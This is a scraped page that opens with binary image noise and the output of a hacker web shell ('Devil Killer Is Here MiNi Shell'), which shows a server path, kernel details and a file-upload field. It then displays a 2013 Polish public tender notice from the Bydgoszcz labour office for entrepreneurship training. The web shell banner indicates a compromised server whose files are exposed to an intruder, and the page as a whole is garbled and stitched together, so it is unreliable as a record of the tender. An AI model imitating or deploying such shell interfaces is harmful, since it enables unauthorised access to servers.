JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130220/72572-N-2013.html

<p class="kh_header"><b>Bydgoszcz: USŁUGA SZKOLENIOWA
O NAZWIE ABC PRZEDSIĘBIORCZOŚCI REALIZOWANA DLA POWIATOWEGO URZĘDU PRACY W BYDGOSZCZY</b><br>
<b>Numer ogłoszenia: 72572 - 2013; data zamieszczenia: 20.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Bydgoszczy , ul. Toruńska 147, 85-950 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 36-04-300, faks 052 36-04-341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA SZKOLENIOWA
O NAZWIE ABC PRZEDSIĘBIORCZOŚCI REALIZOWANA DLA POWIATOWEGO URZĘDU PRACY W BYDGOSZCZY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa o nazwie ABC przedsiębiorczości realizowana dla Powiatowego Urzędu Pracy w Bydgoszczy. Liczba szkoleń - 25. Termin realizacji jednego szkolenia -  5 dni. Liczba uczestników wszystkich szkoleń (całego zamówienia) - 250 uczestników. Maksymalna liczba uczestników jednego szkolenia wynosi - 10 uczestników. Minimalna liczba uczestników jednego szkolenia wynosi - 8 uczestników. Zamawiający wymaga żeby zajęcia odbywały się od poniedziałku do piątku po 8 godzin zegarowych dziennie. Godzina  zegarowa szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą 15 minut. Wszystkie zajęcia muszą być przeprowadzone w jednej grupie szkoleniowej.
Zamawiający wyklucza możliwość organizacji zajęć weekendowych lub popołudniowych (tj. po godz. 17.00) oraz w święta, będące dniami ustawowo wolnymi od pracy. Miesiące realizacji szkoleń: od marca do października 2013 roku. Realizacja szkolenia powinna rozpocząć się i zakończyć w tym samym miesiącu kalendarzowym.
Zamawiający przewiduje średnio 6 szkoleń w miesiącu tzn. 3 terminy w miesiącu po 2 szkolenia prowadzone jednocześnie (z możliwością zmiany po uzgodnieniu z wykonawcą) np. 1 tydzień - 2 szkolenia prowadzone jednocześnie, 2 tydzień - 2 szkolenia prowadzone jednocześnie, 3 tydzień - 2 szkolenia prowadzone jednocześnie. Wymagania wstępne dla uczestników szkolenia: 
Szkolenie przeznaczone jest dla osób skierowanych przez Powiatowy Urząd Pracy  w Bydgoszczy, które zamierzają otworzyć działalność gospodarczą.
Grupa docelowa: 
Osoby bezrobotne zarejestrowane w powiatowym urzędzie pracy na terenie województwa kujawsko - pomorskiego zamierzające podjąć zatrudnienie w obszarach niezwiązanych z produkcją roślinną i lub zwierzęcą, które: nie korzystały i nie skorzystają równolegle z innych środków publicznych, w tym zwłaszcza ze środków Funduszu Pracy, PFRON oraz środków oferowanych w ramach PO KL  na pokrycie tych samych wydatków związanych z podjęciem oraz prowadzeniem działalności gospodarczej bądź też założeniem spółdzielni  lub spółdzielni socjalnej, nie otrzymały bezzwrotnych środków Funduszu Pracy lub innych środków publicznych na podjęcie działalności gospodarczej lub rolniczej, założenie lub przystąpienie  do spółdzielni socjalnej oraz są: do 25 roku życia, powyżej 50 roku życia, osobami niepełnosprawnymi, kobietami, długotrwale bezrobotne, mieszkańcami gminy wiejskiej, gminy miejsko-wiejskiej oraz mieszkańcami miasta o wielkości do 25 tys. mieszkańców.
Osoby bezrobotne zarejestrowane w Powiatowym Urzędzie Pracy w Bydgoszczy. Osoby niepełnosprawne zarejestrowane w Powiatowym Urzędzie Pracy w Bydgoszczy mające status osoby poszukującej pracy i niepozostające w zatrudnieniu. Celem szkolenia jest umożliwienie uczestnikom pozyskania wiedzy teoretycznej i praktycznej w zakresie zagadnień prawnych i organizacyjnych umożliwiających złożenie wniosku o przyznanie jednorazowych środków na rozpoczęcie działalności gospodarczej, a następnie samodzielne uruchomienie i prowadzenie działalności gospodarczej. 
Program szkolenia obejmuje 40 godzin zegarowych przeprowadzonych w 5 dni i musi być zrealizowany zgodnie z właściwymi przepisami, w szczególności zgodnie  z rozporządzeniem MPiPS z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz.U. z 2003 r., Nr 169, poz. 1650 z późn. zm.).
Program musi zawierać następujące tematy zajęć edukacyjnych: działalność gospodarcza - aspekty prawne (4 godz.), działalność gospodarcza - aspekty ekonomiczne (4 godz.), prawo pracy (4 godz.), zasady tworzenia i opracowywania biznes planu wniosku o przyznanie jednorazowych środków na podjęcie działalności gospodarczej wraz z analizą ekonomiczno- finansową biznes planu (8 godz.), zajęcia warsztatowe obejmujące opracowanie wstępnej wersji wniosku 
o przyznanie jednorazowych środków na podjęcie działalności gospodarczej oraz biznes planu (16 godz.), egzamin (4 godz.).
Szkolenie musi się zakończyć egzaminem wewnętrznym oraz wydaniem zaświadczenia o ukończeniu szkolenia zgodnego z postanowieniami zawartymi w umowie w sprawie zamówienia publicznego.

Zamawiający wymaga aby: 
biznes plan oraz wniosek o przyznanie jednorazowych środków na podjęcie działalności gospodarczej zostały sporządzone: dla każdego uczestnika oddzielnie, na druku wskazanym przez zamawiającego. Dokumenty (biznes plan oraz wniosek) muszą zostać skompletowane przez wykonawcę najpóźniej w ostatnim dniu zajęć (przed egzaminem) i zatwierdzone (pieczątka i podpis) przez wykładowcę. 
w przypadku szkolenia współfinansowanego z Unii Europejskiej w ramach środków Europejskiego Funduszu Społecznego, Projekt Przedsiębiorczość szansą na rozwój regionu kujawsko-pomorskiego - Działanie 6.2 PO KL Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia  wniosek o przyznanie jednorazowych środków na podjęcie działalności gospodarczej był zaopiniowany (opinia musi zawierać minimum 5 zdań) przez osobę (trenera) prowadzącą zajęcia warsztatowe obejmujące opracowanie wstępnej wersji wniosku o przyznanie jednorazowych środków na podjęcie działalności gospodarczej oraz biznes planu. 
w ostatnim dniu szkolenia były przeprowadzone zajęcia trwające łącznie 4 godz. nie mające bezpośredniego wpływu na przygotowanie biznes planu i wniosku o przyznanie jednorazowych środków na podjęcie działalności gospodarczej (np. z prawa pracy) oraz  egzamin trwający 4 godz. Zamawiający zastrzega, że przy realizacji 2 szkoleń jednocześnie w ostatnim dniu szkolenia egzamin musi być przeprowadzony naprzemiennie tzn. od godz. 8.00 dla jednego szkolenia, od godz. 12.00 dla drugiego szkolenia. 
komisja egzaminacyjna składała się z 3 osób: jednego lub dwóch wykładowców szkolenia (prowadzących zajęcia warsztatowe obejmujące opracowanie wstępnej wersji wniosku o przyznanie jednorazowych środków na podjęcie działalności gospodarczej oraz biznes planu). W przypadku gdy jedna osoba prowadzi wskazane powyżej zajęcia nie ma potrzeby udziału innego wykładowcy, przedstawiciela wykonawcy (dopuszczana jest możliwość udziału drugiego wykładowcy jako przedstawiciela wykonawcy), przedstawiciela zamawiającego w roli obserwatora.

wykonawca przed rozpoczęciem szkolenia dokonał konsultacji z: pracownikiem Centrum Aktywizacji Zawodowej Powiatowego Urzędu Pracy w Bydgoszczy w  Punkcie Wspierania Samozatrudnienia w Bydgoszczy, ul. Mennica 6, tel. 52 585-91-05, w celu sprawdzenia aktualności stosowanych druków (regulaminu, wniosku o przyznanie środków na rozpoczęcie działalności gospodarczej z załącznikami, umowy i innych dokumentów). Ze spotkania zostanie sporządzona notatka podpisana przez każdą ze stron, pracownikiem Centrum Aktywizacji Zawodowej Powiatowego Urzędu Pracy w Bydgoszczy w siedzibie Powiatowego Urzędu Pracy Bydgoszczy ul. Toruńska 147, szkolenia, parter, prawa strona, Pani Elżbieta Pietraszewska, tel. 52 360-43-71, w celu zapoznania się ze specyfiką grupy uczestników jaka zostanie skierowana na szkolenie. Panem Ryszardem Maciejewskim - Zastępcą Dyrektora Powiatowego Urzędu Pracy w Bydgoszczy (tel. 52 36-04-345) - dotyczy skierowania na szkolenie osoby niepełnosprawnej z Powiatu Bydgoskiego, która zamierza ubiegać się o przyznanie środków z PFRON, Panem Jerzym Karwowskim - Kierownikiem Działu Rehabilitacji Osób Niepełnosprawnych Miejskiego Ośrodka Pomocy Społecznej w Bydgoszczy, ul. Ogrodowa 9 (tel. 52 32 54 439 lub 52 32 54 410) - dotyczy skierowania na szkolenie osoby z Bydgoszczy, która zamierza ubiegać się o przyznanie środków z PFRON.

W przypadku szkoleń współfinansowanych z Unii Europejskiej w ramach środków Europejskiego Funduszu Społecznego, Projekt Przedsiębiorczość szansą na rozwój regionu kujawsko-pomorskiego- Działanie 6.2 PO KL - Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia wykonawca zobowiązany jest: 
do prowadzenia rejestru wniosków o przyznanie jednorazowych środków na podjęcie działalności gospodarczej i opinii trenera osoby prowadzącej zajęcia warsztatowe obejmujące opracowanie wstępnej wersji wniosku o przyznanie jednorazowych środków na podjęcie działalności gospodarczej oraz biznes planu. Wzór rejestru zostanie przedstawiony wykonawcy podczas spotkania z pracownikiem Punktu Wspierania Samozatrudnienia przed rozpoczęciem szkolenia oraz przesłany drogą elektroniczną. 
sporządzania kopii wniosków o przyznanie jednorazowych środków na podjęcie działalności gospodarczej wraz z opiniami trenera osoby prowadzącej zajęcia warsztatowe obejmujące opracowanie wstępnej wersji wniosku o przyznanie jednorazowych środków na podjęcie działalności gospodarczej oraz biznes planu.
dostarczenia niezwłocznie po zakończeniu szkolenia kopii (poświadczonych za zgodność z oryginałem przez wykonawcę) wyżej wymienionego rejestru oraz kopii (poświadczonych za zgodność z oryginałem przez wykonawcę) wniosków wraz z  opiniami trenera osoby prowadzącej zajęcia warsztatowe obejmujące opracowanie wstępnej wersji wniosku o przyznanie jednorazowych środków na podjęcie działalności gospodarczej oraz biznes planu do siedziby Powiatowego Urzędu Pracy w Bydgoszczy, ul. Toruńska 147, 85-950 Bydgoszcz, szkolenia, parter, prawa strona do Pani Izabeli Jaszowskiej tel. 52 360-43-72.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada aktualny wpis do Rejestru Instytucji Szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy właściwy dla siedziby wykonawcy, zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69 poz. 415 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponować podczas realizacji zamówienia pomieszczeniami umożliwiającymi realizację zamówienia dostosowanymi do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia oraz o zlikwidowanych barierach architektonicznych umożliwiających osobom niepełnosprawnym udział w szkoleniu, w tym co najmniej 2 salami szkoleniowymi dostosowanymi do ilości osób szkolonych z odpowiednią liczbą miejsc i stolików, oświetleniem, ogrzewaniem i wentylacją oraz z odpowiednią ilością stanowisk komputerowych, zapewniających indywidualny dostęp uczestnikom szkolenia do komputera.  Pomieszczenia muszą być zgodne z rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (Dz. U. z 2003 r. Nr 169, poz. 1650 z późn. zm.), rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 31 grudnia 2002 r. w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach (Dz. U. z 2003 r. Nr 6, poz. 69 z późn. zm.), rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75 poz. 690 z późn. zm.) oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. z 2010 r. Nr 109, poz. 719).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wykształcenie, kwalifikacje, doświadczenia i uprawnienia (jeżeli przepisy prawa nakladajką obowiązek ich posiadania) oraz przygotowanie merytoryczne i praktyczne w pracy z osobami bezrobotnymi z uwzględnieniem grupy docelowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oferta szkoleniowa na wzorze zamawiającego - załącznik nr 2 do SIWZ zgodnej z opisem przedmiotu zamówienia zawartym w załączniku nr 1 do SIWZ, oświadczenie o powiązaniu kapitałowym - załącznik nr 9 do SIWZ, pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Dokument potwierdzający jakość świadczonych usług - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>na pisemny wniosek strony złożony najpóźniej w dniu zaistnienia okoliczności uzasadniających zmianę, za zgodą wyrażoną przez drugą stronę na piśmie w zakresie:
1) zmiany miejsca realizacji szkolenia, w sytuacji, gdy zmiana miejsca będzie spowodowana przyczynami niezależnymi od wykonawcy (np. działanie siły wyższej - zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia i przewidzenia np. awaria prądu, zniszczenie obiektu). Wykonawca zobowiązany będzie do przedstawienia zamawiającemu pisemnie powodów, dla których chce zmienić miejsce realizacji szkolenia wraz ze wskazaniem nowego adresu i opisem nowej bazy dydaktycznej. Nowa miejsce realizacji szkolenia musi spełniać wymagania zamawiającego określone w SIWZ.  
2)zmiany terminu realizacji szkolenia, w sytuacji, gdy zmiana terminu będzie spowodowana przyczynami niezależnymi od wykonawcy lub zamawiającego (np. działanie siły wyższej - zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia i przewidzenia w tym np. śmierć, choroba wykładowcy). Zamawiający wyznaczy w porozumieniu z wykonawcą nowy termin wykonania zamówienia.
3) zmiany osób zdolnych do wykonania zamówienia (kadry dydaktycznej), w sytuacji, gdy zmiana będzie spowodowana przyczynami niezależnymi od wykonawcy (np. działanie siły wyższej - zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia i przewidzenia w tym np. śmierć, choroba wykładowcy). wykonawca zobowiązany będzie do przedstawienia zamawiającemu powodów, dla których chce zmienić osobę/y wraz ze wskazaniem nowej osoby z imienia i nazwiska, tematu zajęć edukacyjnych które będą przez osobę prowadzone oraz przewidywanej daty dokonania zmiany. Wykonawca zobowiązany jest oświadczyć na piśmie, że nowa osoba posiada wykształcenie, kwalifikacje, doświadczenie i uprawnienia (jeżeli przepisy prawa nakładają obowiązek ich posiadania) niezbędne do realizacji zamówienia oraz przygotowanie merytoryczne i  praktyczne w pracy z osobami bezrobotnymi z uwzględnieniem grupy docelowej.
4) zmiany liczby uczestników szkolenia w przypadku: a) niepodjęcia lub rezygnacji uczestnika  ze szkolenia, b) niestawienia się uczestnika na szkoleniu, c) przerwania przez uczestnika udziału w szkoleniu, d) stwierdzenia niezdolności uczestnika do udziału w szkoleniu.
5)zmiany dokumentacji szkolenia, jeżeli przyczyny te są obiektywne, nieleżące po stronie wykonawcy lub zamawiającego, których nie można było wcześniej przewidzieć (np. zmiana przepisów prawnych), a zmiany te są niezbędne do prawidłowego i efektywnego zakończenia szkolenia. Wykonawca zobowiązany będzie do przedstawienia zamawiającemu nowego dokumentu, który uległ zmianie.
W przypadku wystąpienia zmian, o których mowa powyżej Wykonawca zobowiązany jest do przedstawienia zamawiającemu nowego harmonogramu szkolenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowego Urzędu Pracy w Bydgoszczy, ul. Toruńska 147, 85-950 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 09:30, miejsce: w sekretariacie Powiatowego Urzędu Pracy w Bydgoszczy, ul. Toruńska 147, II piętro, pokój 207.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie finansowane ze środków Funduszu Pracy, Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych oraz Unii Europejskiej w ramach środków Europejskiego Funduszu Społecznego, Projekt Przedsiębiorczość szansą na rozwój regionu kujawsko-pomorskiego - Działanie 6.2 PO KL Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia.</p>
